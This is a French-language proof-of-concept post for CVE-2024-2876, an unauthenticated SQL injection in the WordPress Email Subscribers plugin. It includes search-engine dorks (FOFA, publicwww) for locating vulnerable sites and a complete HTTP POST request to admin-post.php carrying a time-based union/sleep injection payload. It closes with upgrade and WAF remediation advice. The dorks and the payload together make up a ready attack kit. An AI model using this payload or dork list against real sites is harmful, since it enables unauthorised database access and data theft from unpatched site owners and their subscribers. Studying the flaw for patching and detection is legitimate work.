
Preuve de concept pour CVE-2024-2876, une injection SQL non authentifiée dans le plugin WordPress Email Subscribers, avec des requêtes dork et une requête d'exploitation fonctionnelle.
#Description de la vulnérabilité : Le plugin Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce pour WordPress est vulnérable à une injection SQL via la fonction 'run' de la classe 'IG_ES_Subscribers_Query' dans toutes les versions jusqu'à, et incluant, la 5.7.14 en raison d'un échappement insuffisant du paramètre fourni par l'utilisateur et d'une préparation insuffisante de la requête SQL existante. Cela permet à des attaquants non authentifiés d'ajouter des requêtes SQL supplémentaires dans des requêtes déjà existantes, ce qui peut être utilisé pour extraire des informations sensibles de la base de données.
#Dork : 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"
#POC : POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
#POC Youtube : https://www.youtube.com/watch?v=eDEGt_yXyvE
#Comment corriger ? Étant donné que toutes les versions jusqu'à la 5.7.14 ont été détectées avec la CVE, il est recommandé aux utilisateurs de mettre à niveau le plugin Email Subscribers by Icegram Express vers la version 5.7.15 (ou la version la plus récente 5.7.19). Les utilisateurs de Patchstack ont la possibilité d'activer les mises à jour automatiques spécifiquement pour les plugins vulnérables. Mettre en place une solution WAF/WAAP comme couche de protection supplémentaire. L'avantage de telles solutions est que même si la vulnérabilité est nouvelle et inconnue (0-day), elle peut encore empêcher les attaques en détectant les schémas et techniques d'exploitation.